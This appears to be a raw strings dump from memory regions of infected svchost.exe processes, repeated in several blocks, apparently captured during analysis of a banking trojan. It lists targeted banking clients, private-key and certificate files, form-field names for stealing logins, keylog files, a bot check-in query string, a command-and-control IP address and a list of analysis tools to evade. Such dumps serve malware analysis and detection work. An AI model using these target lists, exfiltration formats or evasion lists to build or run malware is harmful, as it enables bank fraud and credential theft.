%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_648_rwx_00A20000_00065000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
WINUK0FFOO83I6!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\rkousid.exe
C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_700_rwx_01140000_00056000:

.text
`.data
.reloc
`.rdata
@.data
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_700_rwx_02460000_00065000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
LOCALSERVICE!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\rkousid.exe
C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_824_rwx_006B0000_00056000:

.text
`.data
.reloc
`.rdata
@.data
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
